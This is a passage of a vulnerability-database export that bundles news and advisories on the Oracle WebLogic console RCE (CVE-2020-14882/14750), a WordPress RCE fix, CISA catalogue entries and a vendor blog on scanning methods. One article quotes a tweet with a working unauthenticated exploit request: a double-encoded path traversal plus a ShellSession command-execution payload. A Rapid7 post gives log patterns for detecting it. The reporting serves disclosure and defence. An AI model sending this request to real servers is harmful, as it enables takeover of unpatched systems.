"CVE-2021-26858", "CVE-2021-27065"], "modified": "2022-01-12T10:47:49", "id": "THN:3E9680853FA3A677106A8ED8B7AACBE6", "href": "https://thehackernews.com/2022/01/fbi-nsa-and-cisa-warns-of-russian.html", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "threatpost": [{"lastseen": "2020-11-03T14:00:36", "description": "WordPress released a 5.5.2 update to its ubiquitous web publishing software platform. The update patches a high-severity bug, which could allow a remote unauthenticated attacker to take over a targeted website via a narrowly tailored denial-of-service attack.\n\nIn all, the [WordPress Security and Maintenance Release](<https://wordpress.org/news/2020/10/wordpress-5-5-2-security-and-maintenance-release/>) tackled 10 security bugs and also brought a bevy of feature enhancements to the platform. WordPress said the update was a \u201cshort-cycle security and maintenance release\u201d before the next major release version 5.6. With the update, all versions since WordPress 3.7 will also be current.\n\nOf the ten security bugs patched by WordPress a standout flaw, rated high-severity, could be exploited to allow an unauthenticated attacker to execute remote code on systems hosting the vulnerable website. \n[![](https://media.threatpost.com/wp-content/uploads/sites/103/2019/02/19151457/subscribe2.jpg)](<https://threatpost.com/newsletter-sign/>)\n\n\u201cThe vulnerability allows a remote attacker to compromise the affected website,\u201d WordPress wrote in its bulletin posted Friday. \u201cThe vulnerability exists due to improper management of internal resources within the application, which can turn a denial of service attack into a remote code execution issue.\u201d\n\nThe researcher who found the bug, Omar Ganiev, founder of DeteAct, told Threatpost that the vulnerability\u2019s impact may be high, but the probability an adversary could reproduce the attack in the wild is low.\n\n\u201cThe attack vector is pretty interesting, but very hard to reproduce. And even when the right conditions exist, you have to be able to produce a very accurate DoS attack,\u201d he told Threatpost via a chat-based interview.\n\n\u201cThe principle is to trigger the DoS on the MySQL so that WordPress will think that it\u2019s not installed and then un-DoS on the DB under the same execution thread,\u201d Ganiev said. The bug was found by Ganiev three years ago, however he only reported it to WordPress on July 2019. The delay, he said, was to research different types of proof-of-concept exploits.\n\nNeither WordPress or Ganiev believe the vulnerability has been exploited in the wild.\n\nFour bugs rated \u201cmedium risk\u201d by WordPress were also patched. All of the flaws affected WordPress versions 5.5.1 and earlier. Three of the four vulnerabilities \u2013 a cross-site scripting flaw, improper access control bug and a cross-site request forgery vulnerability \u2013 can each be exploited by a \u201cnon-authenticated user via the internet.\u201d\n\nThe fourth medium-severity bug, a security restriction bypass vulnerability, can be triggered only by a remote authenticated user.\n\nOf the medium-severity bugs the cross-site scripting flaw is potentially the most dangerous. A successful attack lets a remote attacker steal sensitive information, change appearance of the web page, perform phishing and drive-by-download attacks, according to WordPress. Because of insufficient WordPress data sanitization of user-supplied data to an affected website, the security release said a remote attacker \u201ccan trick the victim to follow a specially crafted link and execute arbitrary HTML and script code in user\u2019s browser in context of vulnerable website.\u201d\n\n**Hackers Put Bullseye on Healthcare: [On Nov. 18 at 2 p.m. EDT](<https://threatpost.com/webinars/2020-healthcare-cybersecurity-priorities-data-security-ransomware-and-patching/?utm_source=ART&utm_medium=ART&utm_campaign=Nov_webinar>) find out why hospitals are getting hammered by ransomware attacks in 2020. [Save your spot for this FREE webinar](<https://threatpost.com/webinars/2020-healthcare-cybersecurity-priorities-data-security-ransomware-and-patching/?utm_source=ART&utm_medium=ART&utm_campaign=Nov_webinar>) on healthcare cybersecurity priorities and hear from leading security voices on how data security, ransomware and patching need to be a priority for every sector, and why. Join us Wed., Nov. 18, 2-3 p.m. EDT for this [LIVE](<https://threatpost.com/webinars/2020-healthcare-cybersecurity-priorities-data-security-ransomware-and-patching/?utm_source=ART&utm_medium=ART&utm_campaign=Nov_webinar>), limited-engagement webinar.**\n", "cvss3": {}, "published": "2020-10-30T20:56:19", "type": "threatpost", "title": "WordPress Patches 3-Year-Old High-Severity RCE Bug", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2020-14750", "CVE-2020-14882"], "modified": "2020-10-30T20:56:19", "id": "THREATPOST:B574047DB8D0D69958A618406B0BDAC4", "href": "https://threatpost.com/wordpress-patches-rce-bug/160812/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-10-29T22:18:34", "description": "If an organization hasn\u2019t updated their Oracle WebLogic servers to protect them against a recently disclosed RCE flaw, researchers have a dire warning: \u201cAssume it has been compromised.\u201d\n\nOracle WebLogic Server is a popular application server used in building and deploying enterprise Java EE applications. The console component of the WebLogic Server has a flaw, CVE-2020-14882, which ranks 9.8 out of 10 on the CVSS scale. According to Oracle, the attack is \u201clow\u201d in complexity, requires no privileges and no user interaction and can be exploited by attackers with network access via HTTP.\n\nThe flaw was fixed by [Oracle in the massive October release](<https://threatpost.com/oracle-october-patch-update/160407/>) of its quarterly Critical Patch Update (CPU), which fixed 402 vulnerabilities across various product families. Supported versions that are affected are 10.3.6.0.0, 12.1.3.0.0, 12.2.1.3.0, 12.2.1.4.0 and 14.1.1.0.0.\n\n[![](https://media.threatpost.com/wp-content/uploads/sites/103/2019/02/19151457/subscribe2.jpg)](<https://threatpost.com/newsletter-sign/>)\n\nThe October update was released Oct. 21. Fast forward to this week, Johannes B. Ullrich, dean of research at the SANS Technology Institute, said on Thursday that based on honeypot observations, cybercriminals are now actively targeting the flaw.\n\n\u201cAt this point, we are seeing the scans slow down a bit,\u201d said Ullrich [in a Thursday post](<https://isc.sans.edu/forums/diary/PATCH+NOW+CVE202014882+Weblogic+Actively+Exploited+Against+Honeypots/26734/>). \u201cBut they have reached \u2018saturation\u2019 meaning that all IPv4 addresses have been scanned for this vulnerability. If you find a vulnerable server in your network: Assume it has been compromised.\u201d\n\nUllrich said, the exploits appear to be based on a Wednesday blog post published (in Vietnamese) by \u201cJang,\u201d who described how to leverage the flaw to achieve remote code execution via only one GET request. Below is a proof of concept (POC) video.\n\nUllrich said, exploit attempts on the honeypots so far originate from four IP addresses: 114.243.211.182, 139.162.33.228, 185.225.19.240 and 84.17.37.239.\n\nUllrich[ and others](<https://twitter.com/GossiTheDog/status/1321430443611328513>) are urging Oracle WebLogic Server users to update their systems as soon as possible. Users can find a patch availability document for WebLogic and other vulnerable Oracle products, [available here](<https://www.oracle.com/security-alerts/cpuoct2020traditional.html>).\n\n> One for detection peeps. This Oracle WebLogic bug will get abused, pre-auth RCE via a POST request. <https://t.co/y6huXWUuS0>\n> \n> \u2014 Kevin Beaumont (@GossiTheDog) [October 28, 2020](<https://twitter.com/GossiTheDog/status/1321430443611328513?ref_src=twsrc%5Etfw>)\n\nOracle WebLogic servers continue to be hard hit with exploits. In May 2020, Oracle urged customers to [fast-track a patch for a critical flaw](<https://threatpost.com/oracle-unpatched-versions-of-weblogic-app-server-under-active-attack/155420/>) in its WebLogic Server under active attack. The company said it has received numerous reports that attackers were targeting the vulnerability [patched last month](<https://threatpost.com/oracle-tackles-405-bugs-for-april-quarterly-patch-update/154737/>). In May 2019, researchers warned that [malicious activity](<https://threatpost.com/oracle-weblogic-exploit-gandcrab-xmrig/144419/>) exploiting a recently disclosed Oracle WebLogic critical deserialization vulnerability (CVE-2019-2725) was surging \u2013 including to spread the \u201c[Sodinokibi\u201d ransomware](<https://threatpost.com/new-sodinokibi-ransomware-exploits-critical-oracle-weblogic-flaw/144233/>). In June 2019, Oracle said that a critical remote code execution flaw in its WebLogic Server ([CVE-2019-2729](<https://www.oracle.com/technetwork/security-advisory/alert-cve-2019-2729-5570780.html>)) was being actively exploited in the wild.\n\n**Hackers Put Bullseye on Healthcare: [On Nov. 18 at 2 p.m. EDT](<https://threatpost.com/webinars/2020-healthcare-cybersecurity-priorities-data-security-ransomware-and-patching/?utm_source=ART&utm_medium=ART&utm_campaign=Nov_webinar>) find out why hospitals are getting hammered by ransomware attacks in 2020. [Save your spot for this FREE webinar](<https://threatpost.com/webinars/2020-healthcare-cybersecurity-priorities-data-security-ransomware-and-patching/?utm_source=ART&utm_medium=ART&utm_campaign=Nov_webinar>)on healthcare cybersecurity priorities and hear from leading security voices on how data security, ransomware and patching need to be a priority for every sector, and why. Join us Wed., Nov. 18, 2-3 p.m. EDT for this [LIVE](<https://threatpost.com/webinars/2020-healthcare-cybersecurity-priorities-data-security-ransomware-and-patching/?utm_source=ART&utm_medium=ART&utm_campaign=Nov_webinar>), limited-engagement webinar.**\n", "cvss3": {}, "published": "2020-10-29T14:49:58", "type": "threatpost", "title": "Oracle WebLogic Server RCE Flaw Under Active Attack", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2019-2725", "CVE-2019-2729", "CVE-2020-14882"], "modified": "2020-10-29T14:49:58", "id": "THREATPOST:4844442F117316BC8EEC54269FACDAA8", "href": "https://threatpost.com/oracle-weblogic-server-rce-flaw-attack/160723/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-11-03T14:35:34", "description": "Oracle has released a rare out-of-band patch for a remote code-execution flaw in several versions of its WebLogic server.\n\nThe vulnerability ([CVE-2020-14750](<https://www.oracle.com/security-alerts/alert-cve-2020-14750.html#AppendixFMW>)) has a CVSS base score of 9.8 out of 10, and is remotely exploitable without authentication (meaning it may be exploited over a network without the need for a username and password).\n\n\u201cDue to the severity of this vulnerability, Oracle strongly recommends that customers apply the updates provided by this Security Alert as soon as possible after they have applied the October 2020 Critical Patch Update,\u201d according to Eric Maurice, director of security assurance at Oracle, [in a Sunday advisory](<https://blogs.oracle.com/security/security-alert-cve-2020-14750-released>).\n\n[![](https://media.threatpost.com/wp-content/uploads/sites/103/2019/02/19151457/subscribe2.jpg)](<https://threatpost.com/newsletter-sign/>)\n\nWhile specific details of the flaw were not disclosed, Oracle\u2019s alert said it exists in the Console of the Oracle WebLogic Server and can be exploited via the HTTP network protocol. A potential attack has \u201clow\u201d complexity and no user interaction is required, said Oracle.\n\nOracle WebLogic Server is a popular application server used in building and deploying enterprise Java EE applications. Affected versions of WebLogic Server include 10.3.6.0.0, 12.1.3.0.0, 12.2.1.3.0, 12.2.1.4.0 and 14.1.1.0.0.\n\n> Oracle released an out-of-band security alert to address a vulnerability\u2014CVE-2020-14750\u2014in Oracle WebLogic Server. Patch ASAP! <https://t.co/34wm2YYgnx> [#Cyber](<https://twitter.com/hashtag/Cyber?src=hash&ref_src=twsrc%5Etfw>) [#Cybersecurity](<https://twitter.com/hashtag/Cybersecurity?src=hash&ref_src=twsrc%5Etfw>) [#InfoSec](<https://twitter.com/hashtag/InfoSec?src=hash&ref_src=twsrc%5Etfw>)\n> \n> \u2014 US-CERT (@USCERT_gov) [November 2, 2020](<https://twitter.com/USCERT_gov/status/1323343180218195969?ref_src=twsrc%5Etfw>)\n\nOracle said that the vulnerability \u201cis related to\u201d CVE-2020-14882, which is also a remote code-execution flaw in WebLogic Servers. CVE-2020-14882 was fixed by [Oracle in the massive October release](<https://threatpost.com/oracle-october-patch-update/160407/>) of its quarterly Critical Patch Update (CPU), which fixed 402 vulnerabilities across various product families. Supported versions that are affected are 10.3.6.0.0, 12.1.3.0.0, 12.2.1.3.0, 12.2.1.4.0 and 14.1.1.0.0.\n\nSecurity experts on Twitter [have pointed to](<https://twitter.com/breditor/status/1323435478218022913>) the fact that the fix for CVE-2020-14882 could be bypassed by merely changing the case of a character in their request. This would thus sidestep the path-traversal blacklist that was implemented to block the flaw, bypassing the patch.\n\n> [#CVE](<https://twitter.com/hashtag/CVE?src=hash&ref_src=twsrc%5Etfw>)-2020\u201314882 Weblogic Unauthorized bypass RCE \nhttp://x.x.x.x:7001/console/images/%252E%252E%252Fconsole.portal\n> \n> POST:\n> \n> _nfpb=true&_pageLabel=&handle=<https://t.co/jBUfUasQC1>.ShellSession(%22java.lang.Runtime.getRuntime().exec(%27calc.exe%27);%22)<https://t.co/nU8xkK30DU> [pic.twitter.com/uLiggjHnQG](<https://t.co/uLiggjHnQG>)\n> \n> \u2014 Jas502n (@jas502n) [October 28, 2020](<https://twitter.com/jas502n/status/1321416053050667009?ref_src=twsrc%5Etfw>)\n\nUpon further analysis of the bypass, \u201cThe web application is making an authorization decision based on the requested path but it is doing so without first fully decoding and canonicalizing the path,\u201d said Craig Young, security researcher with Tripwire, [in an analysis](<https://www.tripwire.com/state-of-security/vert/actively-exploited-weblogic-vulnerability/>). \u201cThe result is that a URL can be constructed to match the pattern for a permitted resource but ultimately access a completely different resource.\u201d\n\n[While the patch for CVE-2020-14882 was released](<https://threatpost.com/oracle-weblogic-server-rce-flaw-attack/160723/>) during an Oct. 21 update, Johannes B. Ullrich, dean of research at the SANS Technology Institute, said last week that based on honeypot observations, cybercriminals are now actively targeting the flaw.\n\nOracle WebLogic servers continue to be hard-hit with exploits. In May, Oracle urged customers to [fast-track a patch for a critical flaw](<https://threatpost.com/oracle-unpatched-versions-of-weblogic-app-server-under-active-attack/155420/>) in its WebLogic Server under active attack. The company said it has received numerous reports that attackers were targeting the vulnerability [patched last month](<https://threatpost.com/oracle-tackles-405-bugs-for-april-quarterly-patch-update/154737/>). In May 2019, researchers warned that [malicious activity](<https://threatpost.com/oracle-weblogic-exploit-gandcrab-xmrig/144419/>) exploiting a recently disclosed Oracle WebLogic critical deserialization vulnerability (CVE-2019-2725) was surging \u2013 including to spread the [REvil/Sodinokibi\u201d ransomware](<https://threatpost.com/new-sodinokibi-ransomware-exploits-critical-oracle-weblogic-flaw/144233/>). In June 2019, Oracle said that a critical remote code-execution flaw in its WebLogic Server ([CVE-2019-2729](<https://www.oracle.com/technetwork/security-advisory/alert-cve-2019-2729-5570780.html>)) was being actively exploited in the wild.\n\n**Hackers Put Bullseye on Healthcare: [On Nov. 18 at 2 p.m. EDT](<https://threatpost.com/webinars/2020-healthcare-cybersecurity-priorities-data-security-ransomware-and-patching/?utm_source=ART&utm_medium=ART&utm_campaign=Nov_webinar>) find out why hospitals are getting hammered by ransomware attacks in 2020. [Save your spot for this FREE webinar ](<https://threatpost.com/webinars/2020-healthcare-cybersecurity-priorities-data-security-ransomware-and-patching/?utm_source=ART&utm_medium=ART&utm_campaign=Nov_webinar>)on healthcare cybersecurity priorities and hear from leading security voices on how data security, ransomware and patching need to be a priority for every sector, and why. Join us Wed., Nov. 18, 2-3 p.m. EDT for this [LIVE](<https://threatpost.com/webinars/2020-healthcare-cybersecurity-priorities-data-security-ransomware-and-patching/?utm_source=ART&utm_medium=ART&utm_campaign=Nov_webinar>), limited-engagement webinar.**\n", "cvss3": {}, "published": "2020-11-03T13:57:26", "type": "threatpost", "title": "Oracle Rushes Emergency Fix for Critical WebLogic Server Flaw", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2019-2725", "CVE-2019-2729", "CVE-2020-14750", "CVE-2020-14882"], "modified": "2020-11-03T13:57:26", "id": "THREATPOST:626313834C3B7D13BDDD703C425DACA5", "href": "https://threatpost.com/oracle-update-weblogic-server-flaw/160889/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "rapid7blog": [{"lastseen": "2020-11-02T20:45:42", "description": "## What\u2019s up?\n\n![Oracle WebLogic Unauthenticated Complete Takeover \$CVE-2020-14882/CVE-2020-14750\$: What You Need to Know](https://blog.rapid7.com/content/images/2020/10/Oracle.jpg)\n\nAs if October 2020 hasn\u2019t been scary enough, Rapid7 Labs, the SANS Internet Storm Center (ISC), and other researchers have caught attackers opting for tricks instead of treats this week as they seek out and attempt to compromise internet-facing WebLogic servers that are vulnerable to CVE-2020-14882 ([AttackerKB Analysis](<https://attackerkb.com/topics/sb4F8UT5zu/cve-2020-14882-unauthenticated-rce-in-console-component-of-oracle-weblogic-server>)), which is an unauthenticated remote code execution (complete compromise) weakness in the Console component of Oracle WebLogic servers.\n\nBefore we sift through the candy loot bag of vulnerability and exploit details, we must pause and **urge Oracle WebLogic Server customers to patch as soon as possible.**\n\n## Vulnerability and exposure details\n\nOn Oct. 20, 2020, Oracle issued an advisory for CVE-2020-14882 in its [quarterly critical patch update](<https://www.oracle.com/security-alerts/cpuoct2020traditional.html>). The vulnerability is _trivial_ to exploit, with a proof-of-concept (PoC) [already available](<https://testbnull.medium.com/weblogic-rce-by-only-one-get-request-cve-2020-14882-analysis-6e4b09981dbf>), courtesy of a researcher who goes by the handle [Jang](<https://twitter.com/testanull/status/1321390624042442753>). The aforelinked Medium post is worth taking the time to translate and walk through, as it provides seriously detailed information on the path Jang took to eventually craft an exploit in _a single HTTP GET request_.\n\nAffected WebLogic versions include:\n\n * 10.3.6.0.0\n * 12.1.3.0.0\n * 12.2.1.3.0\n * 12.2.1.4.0\n * 14.1.1.0.0\n\nRapid7 Labs found just over 2,000 WebLogic Console endpoints on HTTP port 7001 today (Oct. 29, 2020) with a wide version distribution:\n\nversion | n \n---|--- \n10.3.6.0 | 457 \n12.2.1.3.0 | 435 \n12.2.1.4.0 | 403 \n10.3.0.0 | 350 \n12.1.3.0.0 | 111 \n10.3.5.0 | 83 \n12.2.1.2.0 | 75 \n12.2.1.0.0 | 68 \n14.1.1.0.0 | 28 \n12.2.1.1.0 | 16 \n10.3.6.0.0 | 12 \n12.1.1.0 | 10 \n10.3.2.0 | 8 \n12.1.2.0.0 | 7 \n10.3.3.0 | 5 \n10.3.1.0 | 4 \n10.3.4.0 | 1 \n \nFrom this scan, it appears that 111 (12.1.3.0.0) are definitely vulnerable, with an additional 457 (10.3.6.0) potentially also vulnerable (while Oracle does include the version string in the HTML source it is not a _precise_ version string, so some of these could be patched already).\n\n## Attacker activity\n\nThe [SANS Internet Storm Center](<https://isc.sans.edu/diary/rss/26734>) was first to confirm that active exploitation is in progress, and Rapid7 Labs has also seen evidence of opportunistic attackers seeking out vulnerable WebLogic instances.\n\nDue to the widespread dissemination of the proof-of-concept code and evidence of active weaponization/exploitation, we expect to see continued attacks both on the public internet and within organizations where attackers have or will gain footholds.\n\n## Patch, mitigation, and detection guidance\n\nOrganizations running Oracle WebLogic Server should patch **as quickly as possible.** Those that are waiting for a yet-to-occur patch cycle to address CVE-2020-14882 would be well advised to break that cycle in favor of patching as soon as they can. Organizations that are unable to patch immediately should consider the following recommendations as partial mitigations, with the understanding that no mitigation is as effective as patching:\n\n * Ensure the admin portal is not exposed to the public internet; blocking access to the admin portal (TCP port 7001 by default) may act as a partial mitigation until CVE-2020-14882 can be patched.\n * Review application logs for HTTP requests that include the double-encoded path traversal `%252E%252E%252F` and the admin portal `console.portal` in the request URI.\n * Monitor network traffic for suspicious HTTP requests if you have the ability to do so.\n * Monitor for any suspicious processes created by the application, such as `cmd.exe` or `/bin/sh`.\n\n## Updates\n\n * 2020-11-02 \u2014 Oracle has issued a [supplementary advisory](<https://www.oracle.com/security-alerts/alert-cve-2020-14750.html#AppendixFMWl>) for a new CVE ([CVE-2020-14750](<https://attackerkb.com/topics/mzyS1rMcZc/cve-2020-14750-oracle-weblogic-remote-unauthenticated-remote-code-execution-rce-vulnerability>)) which covers an additional, similar unauthenticated remote code execution vulnerability in the same WebLogic component.\n\n#### Vulnerable to CVE-2020-14882? Scan Your Environment Today to Find Out.\n\n[Get Started](<https://www.rapid7.com/trial/insightvm>)", "cvss3": {}, "published": "2020-10-29T20:43:56", "type": "rapid7blog", "title": "Oracle WebLogic Unauthenticated Complete Takeover (CVE-2020-14882/CVE-2020-14750): What You Need to Know", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2020-14750", "CVE-2020-14882"], "modified": "2020-10-29T20:43:56", "id": "RAPID7BLOG:8E02D06635B184C252A0274FC4A163A6", "href": "https://blog.rapid7.com/2020/10/29/oracle-weblogic-unauthenticated-complete-takeover-cve-2020-14882-what-you-need-to-know/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "cisa_kev": [{"lastseen": "2023-07-21T17:22:44", "description": "Oracle WebLogic Server contains an unspecified vulnerability, which is assessed to allow for remote code execution, based on this vulnerability being related to CVE-2020-14750.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-11-03T00:00:00", "type": "cisa_kev", "title": "Oracle WebLogic Server Remote Code Execution Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-14750", "CVE-2020-14882"], "modified": "2021-11-03T00:00:00", "id": "CISA-KEV-CVE-2020-14882", "href": "https://www.cisa.gov/known-exploited-vulnerabilities-catalog", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-07-21T17:22:44", "description": "Oracle WebLogic Server contains an unspecified vulnerability allowing an unauthenticated attacker to perform remote code execution. This vulnerability is related to CVE-2020-14882.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-11-03T00:00:00", "type": "cisa_kev", "title": "Oracle WebLogic Server Remote Code Execution Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-14750", "CVE-2020-14882"], "modified": "2021-11-03T00:00:00", "id": "CISA-KEV-CVE-2020-14750", "href": "https://www.cisa.gov/known-exploited-vulnerabilities-catalog", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "qualysblog": [{"lastseen": "2022-11-01T15:01:40", "description": "As new scanning technologies are released, their supposed superiority is touted over the others. The problem is, however, that there is no best scanning technology, all of them have strengths and limitations. If recent claims from several vendors are believed, a \u201cbest\u201d scanning method called snapshot scanning exists. But when we look closely, snapshot scanning has advantages for specific use cases, like being able to scan paused workloads, but there are also many areas where a different scanner type would be a better choice. So, is there an optimal scanning method? After reading this blog, it should be clear that the answer is no. At Qualys, we recommend you do not rely on a single scanning method \u2013 instead, use multiple scanning technologies when and where they make the most sense. To that end, Qualys has developed a technology to make various scanner types easy to use and manage, which we call FlexScan.\n\n#### **What Is Snapshot Scanning?**\n\nSnapshot scanning uses scanners that capture images of workloads, i.e., snapshots, from a cloud services provider\u2019s (CSP) runtime block storage and then scans them. Runtime block storage is where CSPs store updated images of cloud workloads and resources. Snapshot scanning is essentially an indirect method of scanning cloud workloads by looking at this block storage instead of directly looking at them with agents.\n\n#### **Places Where Snapshot Scanning Makes Sense**\n\nSnapshot scanning has several advantages that sometimes make it the best choice; the main one is that they allow fast and easy setup to quickly onboard a company\u2019s cloud workloads. Because of how simple it is to get this type of scanner up and running in cloud-only environments, they are perfect for use cases where you need to evaluate cloud environments quickly with comprehensive coverage, like mergers and acquisitions (M&A) scenarios. API-scanning has this same quick assessment capability and is even slightly faster at assessing new workloads than snapshot scanning, but API-scanning doesn\u2019t provide comprehensive coverage.\n\nA capability other scanner types don\u2019t provide is a snapshot scanner\u2019s ability to look at images of paused or suspended workloads. Remember, though, that most vendors charge by the number of assets, and paused workloads count as assets, so this capability is not an advantage for everyone.\n\nEven though expensive from a resource standpoint, snapshot scanners can look for malware and sensitive data that require significant computational power. Agents can also do this, but usually, you don\u2019t want to expend workload resources to scan for malware. If you wish to detect malware, snapshot scanners are the best option.\n\n#### **Limitations of Snapshot Scanning**\n\nThere are limitations with snapshot scanners. The most obvious one is that they only work on public clouds. So, suppose you have a hybrid environment, which almost all companies have; you will need to add a second security solution if your vendor only provides snapshot scanners.\n\nSnapshot scanning is also the most expensive detection method due to storage and scanner costs. It is a costly technology to employ, and because its only real strength is easy onboarding, in most use cases, we recommend that it only be used when one-time assessments are needed and leave other use cases to more efficient scanning technology.\n\nThe resource-intensive nature of snapshot scanning also means it is expensive to scan frequently, so most customers that exclusively use this technology scan at most once every 24 hours. A lengthy manual rescan is triggered if a critical zero-day vulnerability is announced. We can compare this to Qualys\u2019 Cloud Agent, whose default scan window is 4 hours.\n\nTwo other limitations of snapshot scanners are that there is some information in workloads that cannot be discerned by examining a static snapshot. The other is that snapshot scanning does not provide an external view of cloud workloads. For these reasons, snapshot scanning should be supplemented with other scanning methods. Here are two examples of vulnerabilities that snapshot scanning has problems with:\n\nSpring4Shell (CVE-2022-22965) \u2013 You are only affected by Spring4Shell vulnerability if Java v9 or later is used. By looking at a snapshot image, you can determine whether you have a vulnerable version. However, you cannot know which Java versions are present on the system and, if there are multiple installed versions, which one is being used. This type of uncertainty can lead to false positives.\n\nWebLogic 0day (CVE-2020-14882) - To detect this vulnerability, you need to determine the install path of WebLogic and assess whether it has already been patched or not. This information can only be determined by executing specific run-time commands and therefore are hard to detect by just looking at a snapshot.\n\n### When Agents Should Be Used\n\n#### **What Is Agent-Based Scanning?**\n\nAgent-based scanning works by placing a small piece of software, an agent, on the host or workload to scan for vulnerabilities, misconfiguration, and other security issues. Modern agents are usually very lightweight, consume minimal resources, and are easy to deploy and maintain.\n\n#### **Where Agents Make the Most Sense**\n\nAgents are the most flexible scanning method because they excel at detection tasks and can also do it continuously. They are also necessary if you want an integrated patch management strategy because they can perform active functions like patching and executing customized mitigation scripts. Some technologies only support public clouds; however, we all know that almost every large enterprise has a hybrid environment that includes on-premises, private, and public clouds. Agents excel at supporting hybrid environments.\n\nAnother significant benefit of agents is that they excel at providing continuous scanning or short scan window support. No other technology even comes close to agents at monitoring assets continuously or supporting short scan windows. Qualys has a scan window as small as 4 hours, while most vendors typically have a 24-hour scan window.\n\n#### **Limitations of Agents**\n\nAgents require the use of some host resources. However, agent implementations like Qualys\u2019 lightweight agent allow you to control this and limit resources to 2% or less of the server, workload, or desktop. \n\nAgents are easy to install; however, the process is not effortless, especially when compared to snapshot scanning. There is a maintenance component involved with agents, but a well-designed architecture like Qualys\u2019 self-updating and self-healing agents can take almost all of the work out of maintenance.\n\n### **When API-Based Scanning Should Be Used**\n\n#### **What is API-based scanning?**\n\nAPI-based scanning is where you use an API to query an information service. It is often used with public cloud service provider (CSP) services from AWS, Azure, Google Cloud, etc., to get configuration and vulnerability information.\n\n#### **Where API-based scanning makes the most sense**\n\nAPI-based scanning is the fastest to implement, assuming CSP-embedded agents like AWS\u2019s System Manager Agents (SSM) are already being used. API-based scanning also makes the most sense when dealing with highly ephemeral workloads. API-based scanning is also the primary scanner type used by Cloud Security Posture Managers (CSPM); without this method of collecting data, CSPMs wouldn\u2019t work. \n\n#### **What are the limitations of API-based scanning?**\n\nThey are great at the limited role of getting data quickly from CSP services. That strength is also their weakness, as they are very specialized in their work and are limited by the services they pull data from. API-based scanning cannot detect CVEs like Spring4Shell (CVE-2021-22965) and Log4Shell (CVE-2021-44228) because it does not have information on any software that is not installed using a package manager.\n\n### **When network scanning should be used**\n\n#### **What Is Networking Scanning?**\n\nNetwork scanning uses a scanner that has a network connection to the resource being scanned. This type of scanner is usually virtualized and can reside anywhere, in the cloud, on-premises, etc., as long as it has network connections to the workloads and resources it needs to scan. Network scanning comes in two flavors, authenticated and unauthenticated. The type most commonly used is authenticated scanning, which is the type that will be discussed here\u2014authenticated network scanning, which means that the network scanner has credentials to access the workload or resources that it performs scans on. \n\n#### **Where Network-Based Scanning Makes the Most Sense**\n\nNetwork scanning is advantageous in two different use cases. It can give you an outside-in view that the other scanners can\u2019t, which is helpful for Payment Card Industry (PCI) compliance and, in a few cases, can find vulnerabilities that are difficult to detect with the other scanning types, because network scanning isn\u2019t limited to only looking at information on the workload or resource. It also can look at network traffic responses, allowing you to detect a small set of vulnerabilities that others cannot.\n\nNetwork scanning is also useful in several non-cloud use cases outside this blog\u2019s scope. Still, one unique use case is their use in sensitive on-premises environments \u2013 because of how well network scanner communications can be controlled and managed.\n\n#### **Limitations of Network Scanning**\n\nNetwork-based scanning is harder to configure, deploy, and maintain than agent-based scanning, primarily due to the complexity of managing the credentials needed.\n\n### What Users Want \u2013 Multiple Scanner Options\n\nIt is clear that there is no scanning technology that is best for every use case. Our customers have told us they want multiple scanner options which are flexible, easy to use, and can be used on the same workloads, which is why we created FlexScan.\n\nToday we are excited to announce \u2013 the Qualys TotalCloud solution with FlexScan that helps our customers extend the trusted power and accuracy of Qualys VMDR, augmented with flexible agent-based and agent-less cloud-native assessment to simplify the management of cloud-native security. Qualys TotalCloud brings both Cloud Posture Management and Cloud Workload Security into a unified view for prioritizing and reducing your cloud security risk.\n\n### **What Is Qualys FlexScan?**\n\nQualys FlexScan is the 